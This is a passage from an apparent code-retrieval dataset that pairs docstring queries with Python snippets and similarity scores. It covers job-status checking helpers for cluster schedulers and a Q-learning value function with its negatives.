bool = False\n ):\n counter = 0\n for job in self.jobs:\n counter += 1\n print(job.job_id)\n if counter == 0:\n ignore_restarts = False\n else:\n ignore_restarts = True\n\n check_input_files(\n hrldas_namelist=job.hrldas_namelist,\n hydro_namelist=job.hydro_namelist,\n sim_dir=os.getcwd(),\n ignore_restarts=ignore_restarts,\n check_nlst_warn=check_nlst_warn\n )", "def _check_can_submit(self):\n if not self.parallel and self.last_submitted_i != self.highest_continuous_done_i:\n raise CannotSubmitNewTask(\n f\"Attempt to get task for {self} \"\n f\"out of order: last submitted {self.last_submitted_i}, \"\n f\"but highest_continuous_done_i is {self.highest_continuous_done_i}.\")\n if self.all_results_arrived:\n raise CannotSubmitNewTask(\n f\"Can't get {self} task: all results already arrived\")\n if self.final_task_submitted:\n raise CannotSubmitNewTask(\n \"Can't get {self} task: final task already submitted\")", "def launch(ctx, force):\n ctl = ctx.ctl\n jobs = ctl('list-avail', '--partition', 'main', flatten=False)\n\n if len(jobs) != 0 and not force:\n click.echo('Job already running', err=True)\n sys.exit(1)\n\n job = ctl('launch', '--partition', 'main')\n click.echo(job.get('id'))\n\n return 0", "def check_executable(op):\n try:\n proc = subprocess.Popen([op], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n except OSError:\n return False\n try:\n if proc.poll():\n proc.kill()\n except OSError:\n return True\n return True", "def check(self):\n exception = False\n for scalerThread in [self.preemptableScaler, self.scaler]:\n if scalerThread is not None:\n try:\n scalerThread.join(timeout=0)\n except Exception as e:\n logger.exception(e)\n exception = True\n if exception:\n raise RuntimeError('The cluster scaler has exited due to an exception')", "def _check_jobs_submitted(status, module):\n\n submitted = False\n if module in status.data:\n jobs = status.data[module]\n for job in jobs.keys():\n if job != 'pipeline_index':\n submitted = True\n break\n return submitted", "def checkBuildStatus(self):\n pass", "def should_run(self):\n return self.pod.file_exists('/gulpfile.js')", "def isFinished(self):\r\n try:\r\n output = Popen(\"qstat | grep \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n if self.jobId in output:\r\n if output.split()[4] == \"Eqw\":\r\n #If the job fails, print a warning, and wait a minute so the user can check why the job fails,\r\n #before resubmitting the job.\r\n logging.warning(\"job \" + output.split()[2] + \" failed to run, resubmitting in one minute\")\r\n time.sleep(60)\r\n output = Popen(\"qdel \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n self.submit()\r\n return False\r\n else:\r\n logging.info(\"job with ID: \" + self.jobId + \" is finished.\")\r\n return True\r\n \r\n except ValueError:\r\n logging.info(\"Error: waiting for not submitted job...\")", "def __which_job_is_running(self):\n\t\tp1 = subprocess.Popen('/usr/bin/atq',stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\t(atqout,stderr) = p1.communicate()\n\t\tfor line in atqout.splitlines():\n\t\t\tjob = line.split('\\t',1)[0]\n\t\t\tif job.isdigit():\n\t\t\t\tp2 = subprocess.Popen(['/usr/bin/at','-c',job], stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\t\t\t(atout,stderr) = p2.communicate()\n\t\t\t\tfor inst in INSTALLERS:\n\t\t\t\t\tif 'command' in INSTALLERS[inst]:\n\t\t\t\t\t\tcmd = INSTALLERS[inst]['command'].split('%')[0]\n\t\t\t\t\t\tMODULE.info(\" ++ Checking for '%s'\" % cmd)\n\t\t\t\t\t\tif cmd in atout:\n# cleaning up is done in 'run_installer()'\n#\t\t\t\t\t\t\tself._current_job = {}\n\t\t\t\t\t\t\tself._current_job['job'] = inst\t\t\t\t# job key\n\t\t\t\t\t\t\tself._current_job['running'] = True\t\t\t# currently running: we have found it per 'at' job\n\t\t\t\t\t\t\tself._current_job['time'] = int(time())\t\t# record the last time we've seen this job\n\t\t\t\t\t\t\tfor line in atout.split(\"\\n\"):\n\t\t\t\t\t\t\t\tmatch = re.search('^\\#\\:([a-z]+)\\:\\s(.*)$',line)\n\t\t\t\t\t\t\t\tif (match):\n\t\t\t\t\t\t\t\t\tvar = match.group(1)\n\t\t\t\t\t\t\t\t\tval = match.group(2)\n\t\t\t\t\t\t\t\t\t# restore numeric strings into numbers!\n\t\t\t\t\t\t\t\t\tif val.isdigit():\n\t\t\t\t\t\t\t\t\t\tself._current_job[var] = int(val)\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tself._current_job[var] = val\n\t\t\t\t\t\t\treturn inst\n\t\treturn ''", "def wait_on_job(self, delay=10):\n while self.isJobRunning() == True:\n time.sleep(delay)\n return self.ofile_exists()", "def is_running(self) -> bool:\n return False", "def wait_for_jobs(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"wait_for_jobs\")", "def check_requirement(self):\n raise NotImplementedError", "def can_run_experiment(self, info, device):\n nb_qubit_max = self.backends[device]['nq']\n nb_qubit_needed = info['nq']\n return nb_qubit_needed <= nb_qubit_max, nb_qubit_max, nb_qubit_needed", "def test_worker_precheck_exception(self):\n assert airflow.settings.validate_session()", "def wait_for_jobs(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"wait_for_jobs\")", "def start_check(self):\n pass", "def could_submit_new_task(self):\n try:\n self._check_can_submit()\n return True\n except CannotSubmitNewTask:\n return False", "def isstarted():", "def test_without_manager_defined():\n try:\n process = subprocess.check_output(['python', 'runserver.py'],\n env={},\n stderr=subprocess.STDOUT,\n shell=True)\n except subprocess.CalledProcessError as error:\n assert error.returncode != 0\n assert 'KeyError: None' in process.output\n assert 'JOB_MANAGER_IMPLEMENTATION' in process.output", "def check_for_work(self):\n print(\"validator: check for work\")\n self.check_for_analyzers()\n self.check_for_uploads()\n self.check_for_requests()", "def runRequirements(self):\n ready = (self.user[\"Save\"] != \"\" and self.user[\"Video\"] != \"\") or self.img_exist\n return ready", "def test_fastqc_exec_notexist():\n try:\n obj = fastqc.FastQC(os.path.join(\".\", \"fastqc\"))\n except NotExecutableError:\n return True\n else:\n return False", "def workers_ready(self, qty=None):\n agents = self.agents_status()\n if any([a['state'] != 'RUNNING' for a in agents]):\n return False\n if qty and len(agents) != qty:\n return False\n return True", "def is_geth_running(self) -> bool:\r\n command = 'docker exec -t %s geth attach ipc://root/abc/geth.ipc --exec \"admin.nodeInfo\"' % self.name\r\n result = self.ip.exec_command(command)\r\n return False if result.split(':')[0] == 'Fatal' else True", "def can_run_job(self, rj_params: RunJobParams) -> Squonk2AgentRv:\n assert rj_params\n assert isinstance(rj_params, RunJobParams)\n\n if _TEST_MODE:\n msg: str = 'Squonk2Agent is in TEST mode'\n _LOGGER.warning(msg)\n\n # Protect against lack of config or connection/setup issues...\n if not self.ping():\n msg = 'Squonk2 ping failed.'\\\n ' Are we configured properly and is Squonk2 alive?'\n _LOGGER.error(msg)\n return Squonk2AgentRv(success=False, msg=msg)\n\n return self._verify_access(c_params=rj_params.common)", "def check_status(job):\n client = get_dropbox_client()\n\n try:\n return client.metadata(\n '/Video Automation Platform/jobs/{job}/{job}.png'.format(job=job))\n\n except ErrorResponse:\n return False", "def _doWork(self) -> bool:\n # grab a job from queur\n self.lock.acquire ()\n jobId = self.nextJob\n self.nextJob = jobId + 1\n self.lock.release ()\n\n # abort if no jobs are left\n if jobId >= len (self.jobs):\n return False\n\n # execute job\n job = self.jobs[jobId]\n lc = job[\"description\"]\n if self.progressCallback != None:\n self.lock.acquire ()\n self.progressCallback (lc, self.executedJobs, len (self.jobs))\n self.lock.release ()\n else:\n print (lc + \" (\" + str (jobId) + \" / \" + str (len (self.jobs)) + \")\\n\")\n if job[\"runner\"] (job) == False:\n return False\n self.executedJobs = self.executedJobs + 1\n\n # continue on jobs\n return True", "def job_has_params(job_url):\n name = job_url.rstrip(\"/\").rsplit(\"/\")[-1]\n if name in (\n \"pr-docs\",\n \"pr-lint\",\n \"pr-pre-commit\",\n ):\n return False\n else:\n return True", "def test_wrong_job(self):\n job = MockJob()\n container_name = 'container_identifier'\n self._mock_open.return_value.__enter__.return_value.readline. \\\n return_value = container_name\n\n # return an error trying to read file with container name\n self._mock_open.return_value.__enter__.side_effect = [\n PermissionError,\n FileNotFoundError,\n ]\n\n self.assertNotEqual(job.pid, 0)\n # non-zero pid, no container name is found -> refer to ForkSpawner\n validation_result = self._container_spawner.validate(job)\n self._mock_open.assert_called()\n self._mock_fork.assert_called()\n self.assertEqual(validation_result,\n spawner.PROCESS_RUNNING)\n # same check, a different exception\n self.assertEqual(self._container_spawner.validate(job),\n spawner.PROCESS_RUNNING)", "async def is_running(self, **kwargs: Any) -> bool:\n return True", "def checkUpstreamScheduler():", "async def is_running(self, **kwargs: Any) -> bool:\n ...", "def running(self) -> bool:", "def _check_job_completeness(self, jobs):\n for job in concurrent.futures.as_completed(jobs):\n if job.exception():\n raise (job.exception())", "def is_job_running(self, condor_id):\n\n classads = self.get_classads(\"OSGRSVUniqueName==\\\"%s\\\"\" % condor_id)\n\n if classads is None:\n self.rsv.log(\"ERROR\", \"Could not determine if job is running\")\n return False\n\n for classad in classads:\n # We put the attribute into the classad in quotes, so search for it accordingly\n if classad[\"OSGRSVUniqueName\"] == '\"' + condor_id + '\"':\n return True\n\n return False", "def check_job_exists( job_list, analysis_group_id, reprocess_config_id):\n for job in job_list:\n struct = JSONMessage.unserialize(job.input_message)\n\n if( int( struct.analysis_group_id ) == int( analysis_group_id ) and \\\n int( struct.reprocess_config_id ) == int( reprocess_config_id ) ):\n return 1\n return 0", "def check(self):\n if self.backend.poll():\n raise RuntimeError('Backend process died.')\n\n if self.esp.poll():\n raise RuntimeError('ESP process died.')", "def can_use_mpi_pool():\n return ALLOW_SPAWN or ALREADY_RUNNING_AS_MPI", "def check_input_file(self):\n\n # Mission critical parameters\n if self.jobname is None:\n sys.exit('Batch_emto.check_input_file: \\'jobname\\' has to be given!')\n\n if self.runtime is None:\n self.runtime = \"48:00:00\"\n if self.emtopath is None:\n self.emtopath = \"./\"\n if self.EMTOdir is None:\n self.EMTOdir = \"$HOME/EMTO5.8/\"\n if self.runKGRN is None:\n self.runKGRN = True\n if self.runKFCD is None:\n self.runKFCD = True\n return", "def jobHealthy(self, count):\n job = self.tester.submission_result.job\n for idx in range(count - 1):\n if (job.health == 'healthy'):\n return True\n print(\"health check fail : %d\" % idx )\n time.sleep(1)\n job.refresh()\n self.assertEqual('healthy', job.health)\n return False", "def test_ready_only_job_pass(self):\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_read_only_pass\"\n name = \"TestReadOnlyPass\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted", "def _can_run(self, plugin: T_Plugin) -> bool:\n now = int(time.time())\n minimum_run_interval = get_plugin_config_option(\n plugin.ID, \"minimum_run_interval\", \"int\", fallback=None\n )\n\n if not minimum_run_interval:\n # Minimum run interval not specified for this plugin\n return True\n\n previous_run_time = self._plugin_run_times.get(plugin.ID, None)\n\n if previous_run_time and previous_run_time + minimum_run_interval > now:\n grace_time_seconds = abs(now - (previous_run_time + minimum_run_interval))\n LOG.info(\n \"Plugin was executed less than %s seconds ago, refusing execution. Plugin can run \"\n \"again in %s seconds.\" % (minimum_run_interval, grace_time_seconds)\n )\n return False\n\n return True", "def _detect(self):\n if monasca_setup.detection.find_process_cmdline('rabbitmq-server') is not None:\n self.available = True", "def is_running(self):\n status = self.get_status_response()\n return ((status[1] & 2) == 2)\n #end is_running()", "def runnable(self):\n if \"calculations\" not in self.ctx:\n return True # if no calculations have run\n return self.ctx.running_calc < 2 and self.can_restart()", "def is_available_while_running(cls) -> bool:\n\n return True", "def _job_succeeded(k8s_ctx: str, k8s_job_file: pathlib.Path, dry_run: bool = False) -> bool:\n if not k8s_job_file.exists():\n raise FileNotFoundError(str(k8s_job_file))\n\n cmd = f'kubectl --context={k8s_ctx} get -f {k8s_job_file} -o json'\n\n if dry_run:\n logging.info(cmd)\n return True\n\n p = safe_exec(cmd)\n if not p.stdout:\n return False\n\n retval = 0\n if not p.stdout:\n return False\n\n json_output = json.loads(p.stdout.decode())\n if 'status' not in json_output:\n return False\n\n final_status = ''\n if 'conditions' in json_output['status'] and len(json_output['status']['conditions']) > 0:\n final_status = json_output['status']['conditions'][0]['type']\n\n if final_status == 'Complete' and 'succeeded' in json_output['status']:\n retval = json_output['status']['succeeded']\n elif final_status == 'Failed' and 'failed' in json_output['status']:\n n = int(json_output['status']['failed'])\n logging.error(f'Job {k8s_job_file} failed {n} time(s)')\n # EB-1236, EB-1243: This exception is not caught anywhere - either catch it in caller,\n # or throw UserReportError instead\n raise RuntimeError(f'Job {k8s_job_file} failed {n} time(s)')\n return int(retval) == 1", "def test_job_exists():\n with tempfile.TemporaryDirectory() as STATUS_DIR:\n Status.add_job(STATUS_DIR, 'generation', 'test1',\n job_attrs={'job_status': 'submitted'})\n exists = Status.job_exists(STATUS_DIR, 'test1')\n assert exists", "def check_n_jobs(n_jobs, allow_cuda=False):\n if not isinstance(n_jobs, int):\n if not allow_cuda:\n raise ValueError('n_jobs must be an integer')\n elif not isinstance(n_jobs, string_types) or n_jobs != 'cuda':\n raise ValueError('n_jobs must be an integer, or \"cuda\"')\n # else, we have n_jobs='cuda' and this is okay, so do nothing\n elif _force_serial:\n n_jobs = 1\n logger.info('... MNE_FORCE_SERIAL set. Processing in forced '\n 'serial mode.')\n elif n_jobs <= 0:\n try:\n import multiprocessing\n n_cores = multiprocessing.cpu_count()\n n_jobs = min(n_cores + n_jobs + 1, n_cores)\n if n_jobs <= 0:\n raise ValueError('If n_jobs has a negative value it must not '\n 'be less than the number of CPUs present. '\n 'You\\'ve got %s CPUs' % n_cores)\n except ImportError:\n # only warn if they tried to use something other than 1 job\n if n_jobs != 1:\n warn('multiprocessing not installed. Cannot run in parallel.')\n n_jobs = 1\n\n return n_jobs", "def has_pending_jobs(instance_properties, max_size):\n try:\n max_cluster_slots = max_size * instance_properties.get(\"slots\")\n pending_jobs = get_pending_jobs_info(max_slots_filter=max_cluster_slots, skip_if_state=SGE_HOLD_STATE)\n logging.info(\"Found the following pending jobs:\\n%s\", pending_jobs)\n return len(pending_jobs) > 0, False\n except Exception as e:\n log.error(\"Failed when checking for pending jobs with exception %s. Reporting no pending jobs.\", e)\n return False, True", "def checkjob(sid, jid):\n with slycat.web.server.remote.get_session(sid) as session:\n return session.checkjob(jid)", "def _check_before_run(self):\n if not osp.exists(self.dataset_dir):\n raise RuntimeError(\"'{}' is not available\".format(self.dataset_dir))", "def check(self):\n with working_dir(self.build_directory):\n self._if_ninja_target_execute(\"test\", parallel=False)", "def checkStatus(self,runlog=None,proc=None):\n if runlog is None:\n raise Exception(\"Cannot checkStatus without runlog\")\n \n # If it's a \"help\" or \"usage\" run, just use the parent checkStatus\n for option in SBATCH_NOSUBMIT_OPTIONS:\n if \"--%s\" % option in runlog[\"cmdstring\"]:\n return super(self.__class__,self).checkStatus(runlog,proc)\n \n result = self.getSlurmStatus(runlog[\"jobid\"]) \n if result in [\"CANCELLED\",\"COMPLETED\",\"FAILED\",\"TIMEOUT\",\"NODE_FAIL\",\"SPECIAL_EXIT\"]:\n return result\n else:\n return None", "def _wait_until_job_starts_on_cluster(self) -> Optional[float]:\n status = None\n job_checking_retry_cnt = 0\n while job_checking_retry_cnt < MAX_JOB_CHECKING_RETRY:\n # Avoid the infinite loop, if any bug happens.\n job_checking_retry_cnt += 1\n try:\n cluster_status, _ = (\n backend_utils.refresh_cluster_status_handle(\n self.cluster_name,\n force_refresh_statuses=set(status_lib.ClusterStatus)))\n except Exception as e: # pylint: disable=broad-except\n # If any unexpected error happens, retry the job checking\n # loop.\n # TODO(zhwu): log the unexpected error to usage collection\n # for future debugging.\n logger.info(f'Unexpected exception: {e}\\nFailed to get the '\n 'refresh the cluster status. Retrying.')\n continue\n if cluster_status != status_lib.ClusterStatus.UP:\n # The cluster can be preempted before the job is\n # launched.\n # Break to let the retry launch kick in.\n logger.info('The cluster is preempted before the job '\n 'is submitted.')\n # TODO(zhwu): we should recover the preemption with the\n # recovery strategy instead of the current while loop.\n break\n\n try:\n status = spot_utils.get_job_status(self.backend,\n self.cluster_name)\n except Exception as e: # pylint: disable=broad-except\n # If any unexpected error happens, retry the job checking\n # loop.\n # Note: the CommandError is already handled in the\n # get_job_status, so it should not happen here.\n # TODO(zhwu): log the unexpected error to usage collection\n # for future debugging.\n logger.info(f'Unexpected exception: {e}\\nFailed to get the '\n 'job status. Retrying.')\n continue\n\n # Check the job status until it is not in initialized status\n if status is not None and status > job_lib.JobStatus.INIT:\n try:\n job_submitted_at = spot_utils.get_job_timestamp(\n self.backend, self.cluster_name, get_end_time=False)\n return job_submitted_at\n except Exception as e: # pylint: disable=broad-except\n # If we failed to get the job timestamp, we will retry\n # job checking loop.\n logger.info(f'Unexpected Exception: {e}\\nFailed to get '\n 'the job start timestamp. Retrying.')\n continue\n # Wait for the job to be started\n time.sleep(spot_utils.JOB_STARTED_STATUS_CHECK_GAP_SECONDS)\n return None", "def check_job(self, a_thread, _):\n if not a_thread.isAlive():\n self.close_button.disabled = False\n self.popup_label.text = \"Process finished. Processed records:\" + str(self.count_funct())\n return False", "def __verify__(cls):\n\n try:\n UpstartSystem()\n return True\n except Exception as e:\n try:\n UpstartSystem(bus=DirectUpstartBus())\n return True\n except Exception as e:\n return False", "def launch_submission(self):\n if self.status == \"running\":\n raise RuntimeError(\"Cannot launch submission: one is already \" \"started\")\n if self.status == \"error\":\n raise RuntimeError(\"Cannot launch submission: the setup failed\")\n try:\n exit_status = aws.launch_train(\n self.config, self.instance.id, self.submission\n )\n except Exception as e:\n logger.error(f\"Unknown error occurred: {e}\")\n exit_status = 1\n\n if exit_status != 0:\n logger.error(\n 'Cannot start training of submission \"{}\"'\n \", an error occured.\".format(self.submission)\n )\n self.status = \"error\"\n else:\n self.status = \"running\"\n return exit_status", "def detect_launch_failure(self):\n\n # Check if the local proc has faulted (poll() will return non-None with a non-zero return\n # code in such cases). If a fault was encountered, raise server error (500) with a message\n # indicating to check the EG log for more information.\n if self.local_proc:\n poll_result = self.local_proc.poll()\n if poll_result and poll_result > 0:\n self.local_proc.wait() # FIXME\n error_message = f\"Error occurred during launch of KernelID: {self.kernel_id}. \" \\\n \"Check Enterprise Gateway log for more information.\"\n self.local_proc = None\n self.log_and_raise(RuntimeError(error_message))", "def check_status(self):", "def check_job_status(job):\n assert isinstance(job, PreprocessJob),\\\n 'job must be a PreprocessJob'\n\n if job.is_finished():\n return True\n\n return True\n \"\"\"\n ye_task = AsyncResult(job.task_id,\n app=preprocess_csv_file)\n\n if ye_task.state == 'SUCCESS':\n\n if ye_task.result['success']:\n\n preprocess_data = ContentFile(json.dumps(ye_task.result['data']))\n\n new_name = 'preprocess_%s.json' % get_alphanumeric_lowercase(8)\n job.metadata_file.save(new_name,\n preprocess_data)\n job.set_state_success()\n\n job.user_message = 'Task completed! Preprocess is available'\n job.save()\n\n else:\n # Didn't work so well\n job.set_state_failure(ye_task.result['message'])\n job.save()\n\n ye_task.forget()\n return True\n\n elif ye_task.state == STATE_FAILURE:\n job.set_state_failure('ye_task failed....')\n job.save()\n ye_task.forget()\n return True\n\n return False\n \"\"\"", "def available(self):\n\t\treturn self.executable(self.path[0]) and \\\n\t\t\tself.executable(self.path[1])", "def _engineServicesRunning():\n process = subprocess.Popen([\"ps\", \"aux\"], stdout=subprocess.PIPE)\n\n stdout = process.communicate()[0]\n result = process.returncode\n if result != 0:\n raise RuntimeError(\"Unable to check for running client job manager\")\n\n # See if the CJM is running\n running = False\n for line in stdout.split(\"\\n\"):\n if \"python\" in line and \"clientjobmanager.client_job_manager\" in line:\n running = True\n break\n\n return running", "def _check_job_status(self) -> str:\n self._assert_job_created()\n\n r = requests.post(\n f'https://{cc.ROUTE_PREFIX}.stratodem.com/jobs/status',\n headers=dict(\n Authorization=f'Bearer {get_api_token()}',\n ),\n json=dict(job_id=self._job_id)\n )\n\n if not r.status_code == 200:\n raise APIQueryFailedException('Failed to determine job status')\n\n r = r.json()\n\n if not r['success']:\n raise APIQueryFailedException(r)\n else:\n return r['message']" ]
[ "0.6642071", "0.66208327", "0.66090924", "0.6534082", "0.6497826", "0.64233065", "0.63549906", "0.6345807", "0.63409173", "0.6323821", "0.63086534", "0.6279424", "0.62567234", "0.62546295", "0.62468517", "0.621095", "0.619517", "0.61762893", "0.6153152", "0.61371064", "0.613373", "0.6101392", "0.609395", "0.60809827", "0.6071481", "0.6046405", "0.60424685", "0.60254186", "0.60223997", "0.6017434", "0.6015161", "0.60146326", "0.6008374", "0.5990759", "0.5989855", "0.596941", "0.5956311", "0.5953527", "0.5950813", "0.5944364", "0.59205323", "0.59176594", "0.59104425", "0.5906326", "0.5870849", "0.58704287", "0.5868258", "0.5848584", "0.58481014", "0.58195066", "0.5809312", "0.5804852", "0.5798318", "0.57956207", "0.57926893", "0.57859516", "0.57856715", "0.5782677", "0.5768665", "0.57617164", "0.57611567", "0.57598096", "0.5759005", "0.57577956", "0.57576555", "0.57561576", "0.5748987", "0.5743777", "0.57278967", "0.5722878", "0.5720903", "0.571799", "0.57172835", "0.5716864", "0.5711732", "0.5706825", "0.57065296", "0.5704081", "0.57029915", "0.5684197", "0.5680857", "0.56806165", "0.56776845", "0.56775045", "0.56770235", "0.56727946", "0.5664774", "0.5647755", "0.5630956", "0.56299675", "0.5627826", "0.561833", "0.5610905", "0.5605133", "0.5600467", "0.5599851", "0.55983055", "0.55959225", "0.5588566", "0.5580554" ]
0.66355747
1
Return Q(s,a) based on current Q >>> q = TabularQ([0,1,2,3],['b','c']) >>> q.set(0, 'b', 5) >>> q.set(0, 'c', 10) >>> q_star = value(q,0) >>> q_star 10
def value(q, s): # Your code here return max(q.get(s,a) for a in q.actions)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _getq(self, q=None):\n if q is None:\n return self.q\n elif isvector(q, self.n):\n return getvector(q, self.n)\n else:\n return getmatrix(q, (None, self.n))", "def calc_q_values(self, state):\n return self.q_values_func([state])[0]", "def getQValue(self, state, action):\n \"\"\"Description:\n return the q-value for current state & action\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n return self.qValues[(state, action)]\n \"\"\" END CODE \"\"\"", "def q(self, s, a):\n # The Q value of the current state is based on the max Q value of the next state.\n next_state_max_q = max([self.qtable[s[0]+x][s[1]+y] for (x,y) in self.maze.moves()])\n self.qtable[s[0]+a[0]][s[1]+a[1]] = (self.qtable[s[0]+a[0]][s[1]+a[1]]\n + self.alpha * (self.r(s,a) + self.gamma * next_state_max_q\n - self.qtable[s[0]+a[0]][s[1]+a[1]]))\n\n return self.qtable[s[0]+a[0]][s[1]+a[1]]", "def get_q_values(self, state):\n raise NotImplemented", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n Q_Value = self.Q\n\n if (state,action) not in Q_Value: #Checks if state is present in dictionary or not, basically if we have ever seen a state or not\n\n Q_Value[(state,action)]= 0.0 #Put value as zero because we have not seen the state as if now\n\n\n return Q_Value[(state,action)] #Returns Q node value\n #util.raiseNotDefined()", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n return self.qValues[(state, action)]", "def scalar_q(q_1: Q) -> Q:\n\n end_q_type = f\"scalar_q({q_1.q_type})\"\n s = Q([q_1.t, 0, 0, 0], q_type=end_q_type, representation=q_1.representation)\n return s", "def getqvalue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n if (state, action) not in self.qvals:\n self.qvals[(state, action)] = 0.0\n return self.qvals[(state, action)]", "def __float__(self):\n return self.q[0]", "def scalar(self):\n return self.q[0]", "def getQValue(self, state, action):\n position = self.computePosition(state)\n action_column = self.columAction[action]\n\n return self.q_table[position][action_column]", "def get_q(self, board_hash):\n if board_hash in self.q:\n qvals = self.q[board_hash]\n else:\n qvals = [0] + [self.q_init_val for i in range(1,10)]\n self.q[board_hash] = qvals\n \n return qvals", "def get_Q_value(self, state, action):\n return self.Q.get((state, action), 0.0) # Return 0.0 if state-action pair does not exist", "def initial_Q(self, negative):\n \n ##get each values in the Q, and change their content to given number, plan to use in Q5\n for key in self.Q.iterkeys():\n self.Q[key] = float(negative)", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n # print \"GETQVALUE in QLEARNINGAGENT, QVALUE: \",self.Q[(state, action)]\n\n return self.Q[(state, action)]\n\n\n util.raiseNotDefined()", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n return self.qValues[(state, action)]", "def qgset(x):\n return 0.2855*x - 0.8565", "def q(self):\n return self._x", "def getQ(m, t):\n\n Q = []\n for r in range(len(t)):\n qrow = []\n for c in range(len(t)):\n qrow.append(m[t[r]][t[c]])\n Q.append(qrow) \n return Q", "def square(q_1: Q) -> Q:\n\n end_q_type = f\"{q_1.q_type}²\"\n\n qxq = _commuting_products(q_1, q_1)\n\n sq_q = Q(q_type=end_q_type, representation=q_1.representation)\n sq_q.t = qxq[\"tt\"] - qxq[\"xx+yy+zz\"]\n sq_q.x = qxq[\"tx+xt\"]\n sq_q.y = qxq[\"ty+yt\"]\n sq_q.z = qxq[\"tz+zt\"]\n\n return sq_q", "def updateQ_value(self, value):\n self.Q_value = (self.Q_value * self.nVisits + value) / (self.nVisits + 1)", "def qubit_values(self):\n return self.label", "def qs_to_q_function(func: FunctionType, q_1: Qs) -> Q:\n\n scalar = func(q_1)\n\n if scalar.qs_type != \"scalar_q\":\n raise Exception(f\"Oops, does not evaluate to a scalar: {scalar}\")\n\n return scalar.qs[0]", "def calcQ(self,thisObs,next_action,reward):\n \n thisObs_tup=(thisObs['volume'],thisObs['time'])\n lastAction_tup=(self.lastAction['vol'],self.lastAction['price'])\n lastObs_tup=(self.lastObs['volume'],self.lastObs['time'])\n lastQvalue=0\n maxQvalue=0\n temp_action=()\n \n if (len(self.Qvalue)>0): \n \"\"\"Searches the Q-value dictionary\"\"\"\n for key,value in self.Qvalue.iteritems():\n \n if (key[0][0]== thisObs_tup[0] and key[0][1]==thisObs_tup[1]):\n if (value > maxQvalue):\n maxQvalue=value\n temp_action = key[1]\n \n if (key[0][0]== lastObs_tup[0] and key[0][1]==lastObs_tup[1] and \n key[1][0]== lastAction_tup[0] and key[1][1]==lastAction_tup[1]):\n \n lastQvalue=self.Qvalue[key]\n #print(\"This state was already encoutered and updated\")\n \n self.Qvalue[(lastObs_tup,lastAction_tup)]=lastQvalue+alpha*(reward+(gamma*maxQvalue)-lastQvalue) \n #print 'The Qtable is',self.Qvalue\n if (len(temp_action)!=0):\n #print \"I found a greedy action\" \n next_action['vol'] = temp_action[0]\n next_action['price']=temp_action[1]\n else: \n next_action=self.return_random_action(thisObs)\n \n return next_action", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n return self.QValueCounter[(state, action)]", "def s(self, q):\n if isinstance(q, QuantumRegister):\n instructions = InstructionSet()\n for j in range(q.size):\n instructions.add(self.s((q, j)))\n return instructions\n\n self._check_qubit(q)\n return self._attach(SGate(q, self))", "def vvalue(self) -> Qval:\n return self.get(self.greedy())", "def convert_to_q(self):\n if self.measure == 'Q':\n warnings.warn('Parameters are already converted to Q!')\n else:\n kappa_sp = self.kappa_s\n kappa_yp = self.kappa_y\n self.kappa_s = self.kappa_s - self.lmbd_s * self.eta_s\n self.kappa_y = self.kappa_y - self.lmbd_y * self.eta_y\n self.scale = kappa_sp / self.kappa_s\n self.mean_v *= (kappa_yp / self.kappa_y * self.scale)\n self.lmbd = 0\n self.eta_y *= (self.scale**.5)\n self.measure = 'Q'\n self.update_ajd()", "def calc_q_values(self, state, Q, flag):\n\n if flag == 0:\n self.train_data = np.concatenate([st.state for st in state])\n return Q.predict_on_batch(self.train_data)\n elif flag == 1:\n return Q.predict_on_batch(np.concatenate([st.next_state for st in state]))", "def simple_q(self: Q) -> Q:\n\n self.t = sp.simplify(self.t)\n self.x = sp.simplify(self.x)\n self.y = sp.simplify(self.y)\n self.z = sp.simplify(self.z)\n return self", "def qalist(self):\n return self._palist.qalist", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n Q_Value = 0 #initializing q value\n\n feat_Extractor = self.featExtractor\n\n weight = self.weights #To get the weight to control exploration and exploitation\n\n features = feat_Extractor.getFeatures(state,action) #to get all the features associated with (state,action) pair\n\n for each_feature in features:\n #refer to README_Reinforcement.txt for the formula at line 11\n temp_Qvalue = weight[each_feature] * features[each_feature] #Q(state,action) = w * featureVector where * is the dotProduct operator\n Q_Value = Q_Value + temp_Qvalue\n\n return Q_Value #Returns final qvalue\n #util.raiseNotDefined()", "def qTable(self, expand=False, factor=False, simplify=False):\n self._compute_kreinParameters(expand=expand, factor=factor,\n simplify=simplify)\n self._.q.rewrite(expand=expand, factor=factor, simplify=simplify)\n return self._.q", "def getQValue(self, state, action):\n return self.qValues[(state, action)]", "def _update_q_value(self, start_state, to_state, reward, iteration):\n if start_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(start_state, self.qstore.q)\n if to_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(to_state, self.qstore.q)\n\n actions = self.qstore.q[start_state.as_tuple()]['actions']\n values = self.qstore.q[start_state.as_tuple()]['utilities']\n\n max_over_next_states = max(self.qstore.q[to_state.as_tuple()]['utilities']) if to_state.terminate != 1 else 0\n\n action_between_states = to_state.as_tuple()\n\n action_index = actions.index(action_between_states)\n learning_rate_alpha = 1 / 